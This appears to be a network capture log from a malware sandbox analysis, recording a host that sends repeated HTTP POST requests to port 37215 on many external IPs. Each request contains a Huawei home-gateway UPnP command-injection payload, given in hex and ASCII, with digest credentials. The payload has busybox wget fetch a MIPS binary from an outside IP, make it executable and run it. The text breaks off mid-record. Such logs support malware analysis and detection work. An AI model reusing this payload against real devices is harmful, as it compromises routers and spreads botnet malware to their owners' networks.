                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    332192.168.2.233547041.101.61.24537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274463892 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    333192.168.2.2356590156.226.16.6637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274502993 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    334192.168.2.2338888197.107.164.23937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274543047 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    335192.168.2.2348220197.173.199.24937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274578094 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    336192.168.2.2360168156.58.162.3437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274630070 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    337192.168.2.235869441.95.142.16337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274661064 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    338192.168.2.235275841.116.22.18337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274702072 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    339192.168.2.2340134197.168.40.14237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274735928 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    340192.168.2.2340428197.99.171.14237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274796009 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    341192.168.2.2346780156.186.16.11837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274832964 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 